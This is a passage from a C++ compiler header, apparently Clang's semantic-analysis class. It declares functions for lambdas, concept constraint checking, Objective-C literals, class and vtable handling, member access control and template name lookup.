/// parameter (the nested-name-specifier before this type) and an
/// output parameter (containing the full nested-name-specifier,
/// including this new type).
///
/// \param TemplateKWLoc the location of the 'template' keyword, if any.
/// \param TemplateName the template name.
/// \param TemplateNameLoc The location of the template name.
/// \param LAngleLoc The location of the opening angle bracket ('<').
/// \param TemplateArgs The template arguments.
/// \param RAngleLoc The location of the closing angle bracket ('>').
/// \param CCLoc The location of the '::'.
///
/// \param EnteringContext Whether we're entering the context of the
/// nested-name-specifier.
///
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXNestedNameSpecifier(Scope *S,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
TemplateTy TemplateName,
SourceLocation TemplateNameLoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc,
SourceLocation CCLoc,
bool EnteringContext);
/// Given a C++ nested-name-specifier, produce an annotation value
/// that the parser can use later to reconstruct the given
/// nested-name-specifier.
///
/// \param SS A nested-name-specifier.
///
/// \returns A pointer containing all of the information in the
/// nested-name-specifier \p SS.
void *SaveNestedNameSpecifierAnnotation(CXXScopeSpec &SS);
/// Given an annotation pointer for a nested-name-specifier, restore
/// the nested-name-specifier structure.
///
/// \param Annotation The annotation pointer, produced by
/// \c SaveNestedNameSpecifierAnnotation().
///
/// \param AnnotationRange The source range corresponding to the annotation.
///
/// \param SS The nested-name-specifier that will be updated with the contents
/// of the annotation pointer.
void RestoreNestedNameSpecifierAnnotation(void *Annotation,
SourceRange AnnotationRange,
CXXScopeSpec &SS);
bool ShouldEnterDeclaratorScope(Scope *S, const CXXScopeSpec &SS);
/// ActOnCXXEnterDeclaratorScope - Called when a C++ scope specifier (global
/// scope or nested-name-specifier) is parsed, part of a declarator-id.
/// After this method is called, according to [C++ 3.4.3p3], names should be
/// looked up in the declarator-id's scope, until the declarator is parsed and
/// ActOnCXXExitDeclaratorScope is called.
/// The 'SS' should be a non-empty valid CXXScopeSpec.
bool ActOnCXXEnterDeclaratorScope(Scope *S, CXXScopeSpec &SS);
/// ActOnCXXExitDeclaratorScope - Called when a declarator that previously
/// invoked ActOnCXXEnterDeclaratorScope(), is finished. 'SS' is the same
/// CXXScopeSpec that was passed to ActOnCXXEnterDeclaratorScope as well.
/// Used to indicate that names should revert to being looked up in the
/// defining scope.
void ActOnCXXExitDeclaratorScope(Scope *S, const CXXScopeSpec &SS);
/// ActOnCXXEnterDeclInitializer - Invoked when we are about to parse an
/// initializer for the declaration 'Dcl'.
/// After this method is called, according to [C++ 3.4.1p13], if 'Dcl' is a
/// static data member of class X, names should be looked up in the scope of
/// class X.
void ActOnCXXEnterDeclInitializer(Scope *S, Decl *Dcl);
/// ActOnCXXExitDeclInitializer - Invoked after we are finished parsing an
/// initializer for the declaration 'Dcl'.
void ActOnCXXExitDeclInitializer(Scope *S, Decl *Dcl);
/// Create a new lambda closure type.
CXXRecordDecl *createLambdaClosureType(SourceRange IntroducerRange,
TypeSourceInfo *Info,
bool KnownDependent,
LambdaCaptureDefault CaptureDefault);
/// Start the definition of a lambda expression.
CXXMethodDecl *startLambdaDefinition(CXXRecordDecl *Class,
SourceRange IntroducerRange,
TypeSourceInfo *MethodType,
SourceLocation EndLoc,
ArrayRef<ParmVarDecl *> Params,
ConstexprSpecKind ConstexprKind);
/// Number lambda for linkage purposes if necessary.
void handleLambdaNumbering(
CXXRecordDecl *Class, CXXMethodDecl *Method,
Optional<std::tuple<unsigned, bool, Decl *>> Mangling = None);
/// Endow the lambda scope info with the relevant properties.
void buildLambdaScope(sema::LambdaScopeInfo *LSI,
CXXMethodDecl *CallOperator,
SourceRange IntroducerRange,
LambdaCaptureDefault CaptureDefault,
SourceLocation CaptureDefaultLoc,
bool ExplicitParams,
bool ExplicitResultType,
bool Mutable);
/// Perform initialization analysis of the init-capture and perform
/// any implicit conversions such as an lvalue-to-rvalue conversion if
/// not being used to initialize a reference.
ParsedType actOnLambdaInitCaptureInitialization(
SourceLocation Loc, bool ByRef, SourceLocation EllipsisLoc,
IdentifierInfo *Id, LambdaCaptureInitKind InitKind, Expr *&Init) {
return ParsedType::make(buildLambdaInitCaptureInitialization(
Loc, ByRef, EllipsisLoc, None, Id,
InitKind != LambdaCaptureInitKind::CopyInit, Init));
}
QualType buildLambdaInitCaptureInitialization(
SourceLocation Loc, bool ByRef, SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions, IdentifierInfo *Id, bool DirectInit,
Expr *&Init);
/// Create a dummy variable within the declcontext of the lambda's
/// call operator, for name lookup purposes for a lambda init capture.
///
/// CodeGen handles emission of lambda captures, ignoring these dummy
/// variables appropriately.
VarDecl *createLambdaInitCaptureVarDecl(SourceLocation Loc,
QualType InitCaptureType,
SourceLocation EllipsisLoc,
IdentifierInfo *Id,
unsigned InitStyle, Expr *Init);
/// Add an init-capture to a lambda scope.
void addInitCapture(sema::LambdaScopeInfo *LSI, VarDecl *Var);
/// Note that we have finished the explicit captures for the
/// given lambda.
void finishLambdaExplicitCaptures(sema::LambdaScopeInfo *LSI);
/// \brief This is called after parsing the explicit template parameter list
/// on a lambda (if it exists) in C++2a.
void ActOnLambdaExplicitTemplateParameterList(SourceLocation LAngleLoc,
ArrayRef<NamedDecl *> TParams,
SourceLocation RAngleLoc);
/// Introduce the lambda parameters into scope.
void addLambdaParameters(
ArrayRef<LambdaIntroducer::LambdaCapture> Captures,
CXXMethodDecl *CallOperator, Scope *CurScope);
/// Deduce a block or lambda's return type based on the return
/// statements present in the body.
void deduceClosureReturnType(sema::CapturingScopeInfo &CSI);
/// ActOnStartOfLambdaDefinition - This is called just before we start
/// parsing the body of a lambda; it analyzes the explicit captures and
/// arguments, and sets up various data-structures for the body of the
/// lambda.
void ActOnStartOfLambdaDefinition(LambdaIntroducer &Intro,
Declarator &ParamInfo, Scope *CurScope);
/// ActOnLambdaError - If there is an error parsing a lambda, this callback
/// is invoked to pop the information about the lambda.
void ActOnLambdaError(SourceLocation StartLoc, Scope *CurScope,
bool IsInstantiation = false);
/// ActOnLambdaExpr - This is called when the body of a lambda expression
/// was successfully completed.
ExprResult ActOnLambdaExpr(SourceLocation StartLoc, Stmt *Body,
Scope *CurScope);
/// Does copying/destroying the captured variable have side effects?
bool CaptureHasSideEffects(const sema::Capture &From);
/// Diagnose if an explicit lambda capture is unused. Returns true if a
/// diagnostic is emitted.
bool DiagnoseUnusedLambdaCapture(SourceRange CaptureRange,
const sema::Capture &From);
/// Build a FieldDecl suitable to hold the given capture.
FieldDecl *BuildCaptureField(RecordDecl *RD, const sema::Capture &Capture);
/// Initialize the given capture with a suitable expression.
ExprResult BuildCaptureInit(const sema::Capture &Capture,
SourceLocation ImplicitCaptureLoc,
bool IsOpenMPMapping = false);
/// Complete a lambda-expression having processed and attached the
/// lambda body.
ExprResult BuildLambdaExpr(SourceLocation StartLoc, SourceLocation EndLoc,
sema::LambdaScopeInfo *LSI);
/// Get the return type to use for a lambda's conversion function(s) to
/// function pointer type, given the type of the call operator.
QualType
getLambdaConversionFunctionResultType(const FunctionProtoType *CallOpType);
/// Define the "body" of the conversion from a lambda object to a
/// function pointer.
///
/// This routine doesn't actually define a sensible body; rather, it fills
/// in the initialization expression needed to copy the lambda object into
/// the block, and IR generation actually generates the real body of the
/// block pointer conversion.
void DefineImplicitLambdaToFunctionPointerConversion(
SourceLocation CurrentLoc, CXXConversionDecl *Conv);
/// Define the "body" of the conversion from a lambda object to a
/// block pointer.
///
/// This routine doesn't actually define a sensible body; rather, it fills
/// in the initialization expression needed to copy the lambda object into
/// the block, and IR generation actually generates the real body of the
/// block pointer conversion.
void DefineImplicitLambdaToBlockPointerConversion(SourceLocation CurrentLoc,
CXXConversionDecl *Conv);
ExprResult BuildBlockForLambdaConversion(SourceLocation CurrentLocation,
SourceLocation ConvLocation,
CXXConversionDecl *Conv,
Expr *Src);
/// Check whether the given expression is a valid constraint expression.
/// A diagnostic is emitted if it is not, and false is returned.
bool CheckConstraintExpression(Expr *CE);
private:
/// \brief Caches pairs of template-like decls whose associated constraints
/// were checked for subsumption and whether or not the first's constraints
/// did in fact subsume the second's.
llvm::DenseMap<std::pair<NamedDecl *, NamedDecl *>, bool> SubsumptionCache;
public:
/// \brief Check whether the given declaration's associated constraints are
/// at least as constrained than another declaration's according to the
/// partial ordering of constraints.
///
/// \param Result If no error occurred, receives the result of true if D1 is
/// at least constrained than D2, and false otherwise.
///
/// \returns true if an error occurred, false otherwise.
bool IsAtLeastAsConstrained(NamedDecl *D1, ArrayRef<const Expr *> AC1,
NamedDecl *D2, ArrayRef<const Expr *> AC2,
bool &Result);
/// \brief Check whether the given list of constraint expressions are
/// satisfied (as if in a 'conjunction') given template arguments.
/// \param ConstraintExprs a list of constraint expressions, treated as if
/// they were 'AND'ed together.
/// \param TemplateArgs the list of template arguments to substitute into the
/// constraint expression.
/// \param TemplateIDRange The source range of the template id that
/// caused the constraints check.
/// \param Satisfaction if true is returned, will contain details of the
/// satisfaction, with enough information to diagnose an unsatisfied
/// expression.
/// \returns true if an error occurred and satisfaction could not be checked,
/// false otherwise.
bool CheckConstraintSatisfaction(TemplateDecl *Template,
ArrayRef<const Expr *> ConstraintExprs,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange,
ConstraintSatisfaction &Satisfaction);
bool CheckConstraintSatisfaction(ClassTemplatePartialSpecializationDecl *TD,
ArrayRef<const Expr *> ConstraintExprs,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange,
ConstraintSatisfaction &Satisfaction);
bool CheckConstraintSatisfaction(VarTemplatePartialSpecializationDecl *TD,
ArrayRef<const Expr *> ConstraintExprs,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange,
ConstraintSatisfaction &Satisfaction);
/// \brief Check whether the given non-dependent constraint expression is
/// satisfied. Returns false and updates Satisfaction with the satisfaction
/// verdict if successful, emits a diagnostic and returns true if an error
/// occured and satisfaction could not be determined.
///
/// \returns true if an error occurred, false otherwise.
bool CheckConstraintSatisfaction(const Expr *ConstraintExpr,
ConstraintSatisfaction &Satisfaction);
/// Check that the associated constraints of a template declaration match the
/// associated constraints of an older declaration of which it is a
/// redeclaration.
bool CheckRedeclarationConstraintMatch(TemplateParameterList *Old,
TemplateParameterList *New);
/// \brief Ensure that the given template arguments satisfy the constraints
/// associated with the given template, emitting a diagnostic if they do not.
///
/// \param Template The template to which the template arguments are being
/// provided.
///
/// \param TemplateArgs The converted, canonicalized template arguments.
///
/// \param TemplateIDRange The source range of the template id that
/// caused the constraints check.
///
/// \returns true if the constrains are not satisfied or could not be checked
/// for satisfaction, false if the constraints are satisfied.
bool EnsureTemplateArgumentListConstraints(TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied.
void
DiagnoseUnsatisfiedConstraint(const ConstraintSatisfaction& Satisfaction);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied.
void
DiagnoseUnsatisfiedConstraint(const ASTConstraintSatisfaction& Satisfaction);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied because it was ill-formed.
void DiagnoseUnsatisfiedIllFormedConstraint(SourceLocation DiagnosticLocation,
StringRef Diagnostic);
void
DiagnoseRedeclarationConstraintMismatch(const TemplateParameterList *Old,
const TemplateParameterList *New);
// ParseObjCStringLiteral - Parse Objective-C string literals.
ExprResult ParseObjCStringLiteral(SourceLocation *AtLocs,
ArrayRef<Expr *> Strings);
ExprResult BuildObjCStringLiteral(SourceLocation AtLoc, StringLiteral *S);
/// BuildObjCNumericLiteral - builds an ObjCBoxedExpr AST node for the
/// numeric literal expression. Type of the expression will be "NSNumber *"
/// or "id" if NSNumber is unavailable.
ExprResult BuildObjCNumericLiteral(SourceLocation AtLoc, Expr *Number);
ExprResult ActOnObjCBoolLiteral(SourceLocation AtLoc, SourceLocation ValueLoc,
bool Value);
ExprResult BuildObjCArrayLiteral(SourceRange SR, MultiExprArg Elements);
/// BuildObjCBoxedExpr - builds an ObjCBoxedExpr AST node for the
/// '@' prefixed parenthesized expression. The type of the expression will
/// either be "NSNumber *", "NSString *" or "NSValue *" depending on the type
/// of ValueType, which is allowed to be a built-in numeric type, "char *",
/// "const char *" or C structure with attribute 'objc_boxable'.
ExprResult BuildObjCBoxedExpr(SourceRange SR, Expr *ValueExpr);
ExprResult BuildObjCSubscriptExpression(SourceLocation RB, Expr *BaseExpr,
Expr *IndexExpr,
ObjCMethodDecl *getterMethod,
ObjCMethodDecl *setterMethod);
ExprResult BuildObjCDictionaryLiteral(SourceRange SR,
MutableArrayRef<ObjCDictionaryElement> Elements);
ExprResult BuildObjCEncodeExpression(SourceLocation AtLoc,
TypeSourceInfo *EncodedTypeInfo,
SourceLocation RParenLoc);
ExprResult BuildCXXMemberCallExpr(Expr *Exp, NamedDecl *FoundDecl,
CXXConversionDecl *Method,
bool HadMultipleCandidates);
ExprResult ParseObjCEncodeExpression(SourceLocation AtLoc,
SourceLocation EncodeLoc,
SourceLocation LParenLoc,
ParsedType Ty,
SourceLocation RParenLoc);
/// ParseObjCSelectorExpression - Build selector expression for \@selector
ExprResult ParseObjCSelectorExpression(Selector Sel,
SourceLocation AtLoc,
SourceLocation SelLoc,
SourceLocation LParenLoc,
SourceLocation RParenLoc,
bool WarnMultipleSelectors);
/// ParseObjCProtocolExpression - Build protocol expression for \@protocol
ExprResult ParseObjCProtocolExpression(IdentifierInfo * ProtocolName,
SourceLocation AtLoc,
SourceLocation ProtoLoc,
SourceLocation LParenLoc,
SourceLocation ProtoIdLoc,
SourceLocation RParenLoc);
//===--------------------------------------------------------------------===//
// C++ Declarations
//
Decl *ActOnStartLinkageSpecification(Scope *S,
SourceLocation ExternLoc,
Expr *LangStr,
SourceLocation LBraceLoc);
Decl *ActOnFinishLinkageSpecification(Scope *S,
Decl *LinkageSpec,
SourceLocation RBraceLoc);
//===--------------------------------------------------------------------===//
// C++ Classes
//
CXXRecordDecl *getCurrentClass(Scope *S, const CXXScopeSpec *SS);
bool isCurrentClassName(const IdentifierInfo &II, Scope *S,
const CXXScopeSpec *SS = nullptr);
bool isCurrentClassNameTypo(IdentifierInfo *&II, const CXXScopeSpec *SS);
bool ActOnAccessSpecifier(AccessSpecifier Access, SourceLocation ASLoc,
SourceLocation ColonLoc,
const ParsedAttributesView &Attrs);
NamedDecl *ActOnCXXMemberDeclarator(Scope *S, AccessSpecifier AS,
Declarator &D,
MultiTemplateParamsArg TemplateParameterLists,
Expr *BitfieldWidth, const VirtSpecifiers &VS,
InClassInitStyle InitStyle);
void ActOnStartCXXInClassMemberInitializer();
void ActOnFinishCXXInClassMemberInitializer(Decl *VarDecl,
SourceLocation EqualLoc,
Expr *Init);
MemInitResult ActOnMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
SourceLocation LParenLoc,
ArrayRef<Expr *> Args,
SourceLocation RParenLoc,
SourceLocation EllipsisLoc);
MemInitResult ActOnMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
Expr *InitList,
SourceLocation EllipsisLoc);
MemInitResult BuildMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
Expr *Init,
SourceLocation EllipsisLoc);
MemInitResult BuildMemberInitializer(ValueDecl *Member,
Expr *Init,
SourceLocation IdLoc);
MemInitResult BuildBaseInitializer(QualType BaseType,
TypeSourceInfo *BaseTInfo,
Expr *Init,
CXXRecordDecl *ClassDecl,
SourceLocation EllipsisLoc);
MemInitResult BuildDelegatingInitializer(TypeSourceInfo *TInfo,
Expr *Init,
CXXRecordDecl *ClassDecl);
bool SetDelegatingInitializer(CXXConstructorDecl *Constructor,
CXXCtorInitializer *Initializer);
bool SetCtorInitializers(CXXConstructorDecl *Constructor, bool AnyErrors,
ArrayRef<CXXCtorInitializer *> Initializers = None);
void SetIvarInitializers(ObjCImplementationDecl *ObjCImplementation);
/// MarkBaseAndMemberDestructorsReferenced - Given a record decl,
/// mark all the non-trivial destructors of its members and bases as
/// referenced.
void MarkBaseAndMemberDestructorsReferenced(SourceLocation Loc,
CXXRecordDecl *Record);
/// The list of classes whose vtables have been used within
/// this translation unit, and the source locations at which the
/// first use occurred.
typedef std::pair<CXXRecordDecl*, SourceLocation> VTableUse;
/// The list of vtables that are required but have not yet been
/// materialized.
SmallVector<VTableUse, 16> VTableUses;
/// The set of classes whose vtables have been used within
/// this translation unit, and a bit that will be true if the vtable is
/// required to be emitted (otherwise, it should be emitted only if needed
/// by code generation).
llvm::DenseMap<CXXRecordDecl *, bool> VTablesUsed;
/// Load any externally-stored vtable uses.
void LoadExternalVTableUses();
/// Note that the vtable for the given class was used at the
/// given location.
void MarkVTableUsed(SourceLocation Loc, CXXRecordDecl *Class,
bool DefinitionRequired = false);
/// Mark the exception specifications of all virtual member functions
/// in the given class as needed.
void MarkVirtualMemberExceptionSpecsNeeded(SourceLocation Loc,
const CXXRecordDecl *RD);
/// MarkVirtualMembersReferenced - Will mark all members of the given
/// CXXRecordDecl referenced.
void MarkVirtualMembersReferenced(SourceLocation Loc, const CXXRecordDecl *RD,
bool ConstexprOnly = false);
/// Define all of the vtables that have been used in this
/// translation unit and reference any virtual members used by those
/// vtables.
///
/// \returns true if any work was done, false otherwise.
bool DefineUsedVTables();
void AddImplicitlyDeclaredMembersToClass(CXXRecordDecl *ClassDecl);
void ActOnMemInitializers(Decl *ConstructorDecl,
SourceLocation ColonLoc,
ArrayRef<CXXCtorInitializer*> MemInits,
bool AnyErrors);
/// Check class-level dllimport/dllexport attribute. The caller must
/// ensure that referenceDLLExportedClassMethods is called some point later
/// when all outer classes of Class are complete.
void checkClassLevelDLLAttribute(CXXRecordDecl *Class);
void checkClassLevelCodeSegAttribute(CXXRecordDecl *Class);
void referenceDLLExportedClassMethods();
void propagateDLLAttrToBaseClassTemplate(
CXXRecordDecl *Class, Attr *ClassAttr,
ClassTemplateSpecializationDecl *BaseTemplateSpec,
SourceLocation BaseLoc);
/// Add gsl::Pointer attribute to std::container::iterator
/// \param ND The declaration that introduces the name
/// std::container::iterator. \param UnderlyingRecord The record named by ND.
void inferGslPointerAttribute(NamedDecl *ND, CXXRecordDecl *UnderlyingRecord);
/// Add [[gsl::Owner]] and [[gsl::Pointer]] attributes for std:: types.
void inferGslOwnerPointerAttribute(CXXRecordDecl *Record);
/// Add [[gsl::Pointer]] attributes for std:: types.
void inferGslPointerAttribute(TypedefNameDecl *TD);
void CheckCompletedCXXClass(Scope *S, CXXRecordDecl *Record);
/// Check that the C++ class annoated with "trivial_abi" satisfies all the
/// conditions that are needed for the attribute to have an effect.
void checkIllFormedTrivialABIStruct(CXXRecordDecl &RD);
void ActOnFinishCXXMemberSpecification(Scope *S, SourceLocation RLoc,
Decl *TagDecl, SourceLocation LBrac,
SourceLocation RBrac,
const ParsedAttributesView &AttrList);
void ActOnFinishCXXMemberDecls();
void ActOnFinishCXXNonNestedClass();
void ActOnReenterCXXMethodParameter(Scope *S, ParmVarDecl *Param);
unsigned ActOnReenterTemplateScope(Scope *S, Decl *Template);
void ActOnStartDelayedMemberDeclarations(Scope *S, Decl *Record);
void ActOnStartDelayedCXXMethodDeclaration(Scope *S, Decl *Method);
void ActOnDelayedCXXMethodParameter(Scope *S, Decl *Param);
void ActOnFinishDelayedMemberDeclarations(Scope *S, Decl *Record);
void ActOnFinishDelayedCXXMethodDeclaration(Scope *S, Decl *Method);
void ActOnFinishDelayedMemberInitializers(Decl *Record);
void MarkAsLateParsedTemplate(FunctionDecl *FD, Decl *FnD,
CachedTokens &Toks);
void UnmarkAsLateParsedTemplate(FunctionDecl *FD);
bool IsInsideALocalClassWithinATemplateFunction();
Decl *ActOnStaticAssertDeclaration(SourceLocation StaticAssertLoc,
Expr *AssertExpr,
Expr *AssertMessageExpr,
SourceLocation RParenLoc);
Decl *BuildStaticAssertDeclaration(SourceLocation StaticAssertLoc,
Expr *AssertExpr,
StringLiteral *AssertMessageExpr,
SourceLocation RParenLoc,
bool Failed);
FriendDecl *CheckFriendTypeDecl(SourceLocation LocStart,
SourceLocation FriendLoc,
TypeSourceInfo *TSInfo);
Decl *ActOnFriendTypeDecl(Scope *S, const DeclSpec &DS,
MultiTemplateParamsArg TemplateParams);
NamedDecl *ActOnFriendFunctionDecl(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParams);
QualType CheckConstructorDeclarator(Declarator &D, QualType R,
StorageClass& SC);
void CheckConstructor(CXXConstructorDecl *Constructor);
QualType CheckDestructorDeclarator(Declarator &D, QualType R,
StorageClass& SC);
bool CheckDestructor(CXXDestructorDecl *Destructor);
void CheckConversionDeclarator(Declarator &D, QualType &R,
StorageClass& SC);
Decl *ActOnConversionDeclarator(CXXConversionDecl *Conversion);
void CheckDeductionGuideDeclarator(Declarator &D, QualType &R,
StorageClass &SC);
void CheckDeductionGuideTemplate(FunctionTemplateDecl *TD);
void CheckExplicitlyDefaultedFunction(Scope *S, FunctionDecl *MD);
bool CheckExplicitlyDefaultedSpecialMember(CXXMethodDecl *MD,
CXXSpecialMember CSM);
void CheckDelayedMemberExceptionSpecs();
bool CheckExplicitlyDefaultedComparison(Scope *S, FunctionDecl *MD,
DefaultedComparisonKind DCK);
void DeclareImplicitEqualityComparison(CXXRecordDecl *RD,
FunctionDecl *Spaceship);
void DefineDefaultedComparison(SourceLocation Loc, FunctionDecl *FD,
DefaultedComparisonKind DCK);
//===--------------------------------------------------------------------===//
// C++ Derived Classes
//
/// ActOnBaseSpecifier - Parsed a base specifier
CXXBaseSpecifier *CheckBaseSpecifier(CXXRecordDecl *Class,
SourceRange SpecifierRange,
bool Virtual, AccessSpecifier Access,
TypeSourceInfo *TInfo,
SourceLocation EllipsisLoc);
BaseResult ActOnBaseSpecifier(Decl *classdecl,
SourceRange SpecifierRange,
ParsedAttributes &Attrs,
bool Virtual, AccessSpecifier Access,
ParsedType basetype,
SourceLocation BaseLoc,
SourceLocation EllipsisLoc);
bool AttachBaseSpecifiers(CXXRecordDecl *Class,
MutableArrayRef<CXXBaseSpecifier *> Bases);
void ActOnBaseSpecifiers(Decl *ClassDecl,
MutableArrayRef<CXXBaseSpecifier *> Bases);
bool IsDerivedFrom(SourceLocation Loc, QualType Derived, QualType Base);
bool IsDerivedFrom(SourceLocation Loc, QualType Derived, QualType Base,
CXXBasePaths &Paths);
// FIXME: I don't like this name.
void BuildBasePathArray(const CXXBasePaths &Paths, CXXCastPath &BasePath);
bool CheckDerivedToBaseConversion(QualType Derived, QualType Base,
SourceLocation Loc, SourceRange Range,
CXXCastPath *BasePath = nullptr,
bool IgnoreAccess = false);
bool CheckDerivedToBaseConversion(QualType Derived, QualType Base,
unsigned InaccessibleBaseID,
unsigned AmbigiousBaseConvID,
SourceLocation Loc, SourceRange Range,
DeclarationName Name,
CXXCastPath *BasePath,
bool IgnoreAccess = false);
std::string getAmbiguousPathsDisplayString(CXXBasePaths &Paths);
bool CheckOverridingFunctionAttributes(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
/// CheckOverridingFunctionReturnType - Checks whether the return types are
/// covariant, according to C++ [class.virtual]p5.
bool CheckOverridingFunctionReturnType(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
/// CheckOverridingFunctionExceptionSpec - Checks whether the exception
/// spec is a subset of base spec.
bool CheckOverridingFunctionExceptionSpec(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
bool CheckPureMethod(CXXMethodDecl *Method, SourceRange InitRange);
/// CheckOverrideControl - Check C++11 override control semantics.
void CheckOverrideControl(NamedDecl *D);
/// DiagnoseAbsenceOfOverrideControl - Diagnose if 'override' keyword was
/// not used in the declaration of an overriding method.
void DiagnoseAbsenceOfOverrideControl(NamedDecl *D);
/// CheckForFunctionMarkedFinal - Checks whether a virtual member function
/// overrides a virtual member function marked 'final', according to
/// C++11 [class.virtual]p4.
bool CheckIfOverriddenFunctionIsMarkedFinal(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
//===--------------------------------------------------------------------===//
// C++ Access Control
//
enum AccessResult {
AR_accessible,
AR_inaccessible,
AR_dependent,
AR_delayed
};
bool SetMemberAccessSpecifier(NamedDecl *MemberDecl,
NamedDecl *PrevMemberDecl,
AccessSpecifier LexicalAS);
AccessResult CheckUnresolvedMemberAccess(UnresolvedMemberExpr *E,
DeclAccessPair FoundDecl);
AccessResult CheckUnresolvedLookupAccess(UnresolvedLookupExpr *E,
DeclAccessPair FoundDecl);
AccessResult CheckAllocationAccess(SourceLocation OperatorLoc,
SourceRange PlacementRange,
CXXRecordDecl *NamingClass,
DeclAccessPair FoundDecl,
bool Diagnose = true);
AccessResult CheckConstructorAccess(SourceLocation Loc,
CXXConstructorDecl *D,
DeclAccessPair FoundDecl,
const InitializedEntity &Entity,
bool IsCopyBindingRefToTemp = false);
AccessResult CheckConstructorAccess(SourceLocation Loc,
CXXConstructorDecl *D,
DeclAccessPair FoundDecl,
const InitializedEntity &Entity,
const PartialDiagnostic &PDiag);
AccessResult CheckDestructorAccess(SourceLocation Loc,
CXXDestructorDecl *Dtor,
const PartialDiagnostic &PDiag,
QualType objectType = QualType());
AccessResult CheckFriendAccess(NamedDecl *D);
AccessResult CheckMemberAccess(SourceLocation UseLoc,
CXXRecordDecl *NamingClass,
DeclAccessPair Found);
AccessResult
CheckStructuredBindingMemberAccess(SourceLocation UseLoc,
CXXRecordDecl *DecomposedClass,
DeclAccessPair Field);
AccessResult CheckMemberOperatorAccess(SourceLocation Loc,
Expr *ObjectExpr,
Expr *ArgExpr,
DeclAccessPair FoundDecl);
AccessResult CheckAddressOfMemberAccess(Expr *OvlExpr,
DeclAccessPair FoundDecl);
AccessResult CheckBaseClassAccess(SourceLocation AccessLoc,
QualType Base, QualType Derived,
const CXXBasePath &Path,
unsigned DiagID,
bool ForceCheck = false,
bool ForceUnprivileged = false);
void CheckLookupAccess(const LookupResult &R);
bool IsSimplyAccessible(NamedDecl *Decl, CXXRecordDecl *NamingClass,
QualType BaseType);
bool isMemberAccessibleForDeletion(CXXRecordDecl *NamingClass,
DeclAccessPair Found, QualType ObjectType,
SourceLocation Loc,
const PartialDiagnostic &Diag);
bool isMemberAccessibleForDeletion(CXXRecordDecl *NamingClass,
DeclAccessPair Found,
QualType ObjectType) {
return isMemberAccessibleForDeletion(NamingClass, Found, ObjectType,
SourceLocation(), PDiag());
}
void HandleDependentAccessCheck(const DependentDiagnostic &DD,
const MultiLevelTemplateArgumentList &TemplateArgs);
void PerformDependentDiagnostics(const DeclContext *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs);
void HandleDelayedAccessCheck(sema::DelayedDiagnostic &DD, Decl *Ctx);
/// When true, access checking violations are treated as SFINAE
/// failures rather than hard errors.
bool AccessCheckingSFINAE;
enum AbstractDiagSelID {
AbstractNone = -1,
AbstractReturnType,
AbstractParamType,
AbstractVariableType,
AbstractFieldType,
AbstractIvarType,
AbstractSynthesizedIvarType,
AbstractArrayType
};
bool isAbstractType(SourceLocation Loc, QualType T);
bool RequireNonAbstractType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser);
template <typename... Ts>
bool RequireNonAbstractType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireNonAbstractType(Loc, T, Diagnoser);
}
void DiagnoseAbstractType(const CXXRecordDecl *RD);
//===--------------------------------------------------------------------===//
// C++ Overloaded Operators [C++ 13.5]
//
bool CheckOverloadedOperatorDeclaration(FunctionDecl *FnDecl);
bool CheckLiteralOperatorDeclaration(FunctionDecl *FnDecl);
//===--------------------------------------------------------------------===//
// C++ Templates [C++ 14]
//
void FilterAcceptableTemplateNames(LookupResult &R,
bool AllowFunctionTemplates = true,
bool AllowDependent = true);
bool hasAnyAcceptableTemplateNames(LookupResult &R,
bool AllowFunctionTemplates = true,
bool AllowDependent = true,
bool AllowNonTemplateFunctions = false);
/// Try to interpret the lookup result D as a template-name.
///
/// \param D A declaration found by name lookup.
/// \param AllowFunctionTemplates Whether function templates should be
/// considered valid results.
/// \param AllowDependent Whether unresolved using declarations (that might
/// name templates) should be considered valid results.
NamedDecl *getAsTemplateNameDecl(NamedDecl *D,
bool AllowFunctionTemplates = true,
bool AllowDependent = true);
enum class AssumedTemplateKind {
/// This is not assumed to be a template name.
None,
/// This is assumed to be a template name because lookup found nothing.
FoundNothing,
/// This is assumed to be a template name because lookup found one or more
/// functions (but no function templates).
FoundFunctions,
};
bool LookupTemplateName(LookupResult &R, Scope *S, CXXScopeSpec &SS,
QualType ObjectType, bool EnteringContext,
bool &MemberOfUnknownSpecialization,
SourceLocation TemplateKWLoc = SourceLocation(),
AssumedTemplateKind *ATK = nullptr);
TemplateNameKind isTemplateName(Scope *S,
CXXScopeSpec &SS,
bool hasTemplateKeyword,
const UnqualifiedId &Name,
ParsedType ObjectType,
bool EnteringContext,
TemplateTy &Template,
bool &MemberOfUnknownSpecialization);
/// Try to resolve an undeclared template name as a type template.
///
/// Sets II to the identifier corresponding to the template name, and updates
/// Name to a corresponding (typo-corrected) type template name and TNK to
/// the corresponding kind, if possible.
void ActOnUndeclaredTypeTemplateName(Scope *S, TemplateTy &Name,
TemplateNameKind &TNK,
SourceLocation NameLoc,
IdentifierInfo *&II);
